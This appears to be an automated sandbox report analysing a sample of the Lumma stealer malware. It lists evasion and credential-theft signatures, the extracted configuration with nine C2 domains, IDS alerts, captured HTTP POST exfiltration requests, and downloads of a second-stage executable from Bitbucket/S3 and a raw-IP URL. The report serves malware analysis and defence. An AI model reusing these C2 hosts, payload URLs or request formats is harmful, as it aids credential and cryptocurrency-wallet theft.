Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fr2Mul3G6m.exe

Overview

General Information

Sample name:fr2Mul3G6m.exe
renamed because original name is a hash value
Original sample name:5bb8a1264df6a69e4b6118482039c003.exe
Analysis ID:1579972
MD5:5bb8a1264df6a69e4b6118482039c003
SHA1:59e9794fe86278c299f500fd1d4f55223e77e780
SHA256:9715a455350670d16eb95de41f06347c6d19fd27995dad20444517022ed90013
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • fr2Mul3G6m.exe (PID: 7248 cmdline: "C:\Users\user\Desktop\fr2Mul3G6m.exe" MD5: 5BB8A1264DF6A69E4B6118482039C003)
    • WerFault.exe (PID: 7536 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7248 -s 2000 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["tentabatte.lat", "observerfry.lat", "wordyfindy.lat", "shapestickyr.lat", "talkynicer.lat", "slipperyloo.lat", "curverpluch.lat", "bashfulacid.lat", "manyrestro.lat"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000005.00000003.1452299566.0000000000B55000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000003.1431492367.0000000000BAA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000003.1431528606.0000000000B55000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000005.00000003.1429087929.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000005.00000003.1432099705.0000000000B55000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 5 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T17:20:20.332106+010020283713Unknown Traffic192.168.2.1049707104.21.36.201443TCP
                2024-12-23T17:20:22.413487+010020283713Unknown Traffic192.168.2.1049708104.21.36.201443TCP
                2024-12-23T17:20:25.340919+010020283713Unknown Traffic192.168.2.1049719104.21.36.201443TCP
                2024-12-23T17:20:28.045455+010020283713Unknown Traffic192.168.2.1049725104.21.36.201443TCP
                2024-12-23T17:20:30.830667+010020283713Unknown Traffic192.168.2.1049731104.21.36.201443TCP
                2024-12-23T17:20:33.685026+010020283713Unknown Traffic192.168.2.1049738104.21.36.201443TCP
                2024-12-23T17:20:36.221414+010020283713Unknown Traffic192.168.2.1049749104.21.36.201443TCP
                2024-12-23T17:20:41.504421+010020283713Unknown Traffic192.168.2.1049762104.21.36.201443TCP
                2024-12-23T17:20:44.012855+010020283713Unknown Traffic192.168.2.1049768185.166.143.49443TCP
                2024-12-23T17:20:46.351193+010020283713Unknown Traffic192.168.2.10497743.5.25.145443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T17:20:21.088275+010020546531A Network Trojan was detected192.168.2.1049707104.21.36.201443TCP
                2024-12-23T17:20:23.265224+010020546531A Network Trojan was detected192.168.2.1049708104.21.36.201443TCP
                2024-12-23T17:20:42.271988+010020546531A Network Trojan was detected192.168.2.1049762104.21.36.201443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T17:20:21.088275+010020498361A Network Trojan was detected192.168.2.1049707104.21.36.201443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T17:20:23.265224+010020498121A Network Trojan was detected192.168.2.1049708104.21.36.201443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T17:20:26.685185+010020480941Malware Command and Control Activity Detected192.168.2.1049719104.21.36.201443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: fr2Mul3G6m.exeAvira: detected
                Found malware configuration
                Source: fr2Mul3G6m.exe.7248.5.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["tentabatte.lat", "observerfry.lat", "wordyfindy.lat", "shapestickyr.lat", "talkynicer.lat", "slipperyloo.lat", "curverpluch.lat", "bashfulacid.lat", "manyrestro.lat"], "Build id": "LOGS11--LiveTraffic"}
                Multi AV Scanner detection for submitted file
                Source: fr2Mul3G6m.exeReversingLabs: Detection: 60%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: fr2Mul3G6m.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString decryptor: bashfulacid.lat
                Source: 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString decryptor: tentabatte.lat
                Source: 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString decryptor: curverpluch.lat
                Source: 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString decryptor: talkynicer.lat
                Source: 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString decryptor: shapestickyr.lat
                Source: 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString decryptor: manyrestro.lat
                Source: 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString decryptor: slipperyloo.lat
                Source: 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString decryptor: wordyfindy.lat
                Source: 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString decryptor: observerfry.lat
                Source: 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000005.00000003.1294466143.0000000004860000.00000004.00001000.00020000.00000000.sdmpString decryptor: LOGS11--LiveTraffic
                Source: fr2Mul3G6m.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49749 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49762 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.10:49768 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.5.25.145:443 -> 192.168.2.10:49774 version: TLS 1.2
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeDirectory queried: number of queries: 1001

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49708 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:49719 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49708 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49707 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49707 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49762 -> 104.21.36.201:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: tentabatte.lat
                Source: Malware configuration extractorURLs: observerfry.lat
                Source: Malware configuration extractorURLs: wordyfindy.lat
                Source: Malware configuration extractorURLs: shapestickyr.lat
                Source: Malware configuration extractorURLs: talkynicer.lat
                Source: Malware configuration extractorURLs: slipperyloo.lat
                Source: Malware configuration extractorURLs: curverpluch.lat
                Source: Malware configuration extractorURLs: bashfulacid.lat
                Source: Malware configuration extractorURLs: manyrestro.lat
                Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49707 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49708 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49719 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49731 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49725 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49749 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49738 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49762 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49768 -> 185.166.143.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49774 -> 3.5.25.145:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=P6HQ0NNFDA95PII8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12841Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DMF4MXVT43YC3GXY7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15074Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AFMYWLKSIOFDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20406Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5W82Y2VIL7Z8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1230Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5UTL55JDRO0MDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571392Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: observerfry.lat
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBMCGIYG4&Signature=MwdFjSVvRTtUMhrKnS0ADjCdj%2BE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJIMEYCIQCwJILF2PjKxyx5vAxAV73HfzgzvSyFAXVrOBvKYyt8PQIhAOdztiCBWEvV2qouvG7bsz9QPfIIuEPwLPSFr9s9WNASKrACCNn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgzxrN0KOEH15yWTkuYqhALpZLUobHZAjSFUdGc6%2FstWYFcwFkCIN6wBAur9ym%2Bx27QtmKeJna5vkKnzJ9eYD78uI76p3HubjrIoVsX4TAiRhYq9JMgl0iLM6bKKE2mpndzW4WlwDvAc9cIRCYnooMCDEDk%2BWi7CIsIhzjAMjHsSNwHx2fs0f4QaWux1EuFDVbII553xmsE6nwCV04ret%2B24FulYLj8mN2oxbhTeFR0BI2MBJSWzfWLB9IdmgdizEb5d2%2Fj6HLhAGU29BdcDHvaV6F89h%2FwrVGvWIH93pBV6N1fQv5HZO6c2o0F9bD2eVJPcBBCixNQ85of04AorKC%2BjQnNGO9HTJPZxf%2F9%2BODtubfvDyzC0l6a7BjqcAQbAiUx9RQLShiyScGA1kbkexaR%2FA6TGZ%2F2aLEhmULy6VgALgWN32CiKxrc5N8c5olqLrt0DipR%2F%2F7MmsHColzgGXJLmUHrm13atMcZf%2FuBb%2BPxmHLYKU6KY3khkqB1439PExiAmI%2B%2FesljW6FwX4pD1%2F%2BLOnKhnvqGABfClxpP2oCMpWBfAqr8klD8h%2FE8t%2FiVvhTRGm%2FxcS4H%2FgA%3D%3D&Expires=1734972092 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBMCGIYG4&Signature=MwdFjSVvRTtUMhrKnS0ADjCdj%2BE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJIMEYCIQCwJILF2PjKxyx5vAxAV73HfzgzvSyFAXVrOBvKYyt8PQIhAOdztiCBWEvV2qouvG7bsz9QPfIIuEPwLPSFr9s9WNASKrACCNn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgzxrN0KOEH15yWTkuYqhALpZLUobHZAjSFUdGc6%2FstWYFcwFkCIN6wBAur9ym%2Bx27QtmKeJna5vkKnzJ9eYD78uI76p3HubjrIoVsX4TAiRhYq9JMgl0iLM6bKKE2mpndzW4WlwDvAc9cIRCYnooMCDEDk%2BWi7CIsIhzjAMjHsSNwHx2fs0f4QaWux1EuFDVbII553xmsE6nwCV04ret%2B24FulYLj8mN2oxbhTeFR0BI2MBJSWzfWLB9IdmgdizEb5d2%2Fj6HLhAGU29BdcDHvaV6F89h%2FwrVGvWIH93pBV6N1fQv5HZO6c2o0F9bD2eVJPcBBCixNQ85of04AorKC%2BjQnNGO9HTJPZxf%2F9%2BODtubfvDyzC0l6a7BjqcAQbAiUx9RQLShiyScGA1kbkexaR%2FA6TGZ%2F2aLEhmULy6VgALgWN32CiKxrc5N8c5olqLrt0DipR%2F%2F7MmsHColzgGXJLmUHrm13atMcZf%2FuBb%2BPxmHLYKU6KY3khkqB1439PExiAmI%2B%2FesljW6FwX4pD1%2F%2BLOnKhnvqGABfClxpP2oCMpWBfAqr8klD8h%2FE8t%2FiVvhTRGm%2FxcS4H%2FgA%3D%3D&Expires=1734972092 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: global trafficDNS traffic detected: DNS query: observerfry.lat
                Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
                Source: fr2Mul3G6m.exe, 00000005.00000002.2037623366.0000000000B47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
                Source: fr2Mul3G6m.exe, 00000005.00000002.2037623366.0000000000B47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exentS
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614571501.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614236994.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: fr2Mul3G6m.exe, 00000005.00000003.1400681191.000000000536E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: fr2Mul3G6m.exe, 00000005.00000003.1400681191.000000000536E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614236994.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614571501.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614236994.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614800650.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000002.2037949478.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614352780.0000000000BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614571501.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614236994.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: fr2Mul3G6m.exe, 00000005.00000003.1452299566.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1509909217.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1431528606.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1343341041.0000000000B91000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1456632127.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1432099705.0000000000B55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: fr2Mul3G6m.exe, 00000005.00000003.1400681191.000000000536E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614571501.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614236994.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: fr2Mul3G6m.exe, 00000005.00000003.1400681191.000000000536E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: fr2Mul3G6m.exe, 00000005.00000003.1400681191.000000000536E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614571501.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614236994.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: fr2Mul3G6m.exe, 00000005.00000003.1400681191.000000000536E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: fr2Mul3G6m.exe, 00000005.00000003.1400681191.000000000536E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: fr2Mul3G6m.exe, 00000005.00000002.2040229853.00000000058E9000.00000002.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614183822.0000000005333000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614005778.00000000053F0000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614066380.0000000005361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: fr2Mul3G6m.exe, 00000005.00000003.1400681191.000000000536E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614571501.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614236994.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614571501.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614236994.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614236994.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614800650.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000002.2037949478.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614352780.0000000000BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: fr2Mul3G6m.exe, 00000005.00000003.1614571501.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614236994.0000000000BD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                Source: fr2Mul3G6m.exe, 00000005.00000003.1400681191.000000000536E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
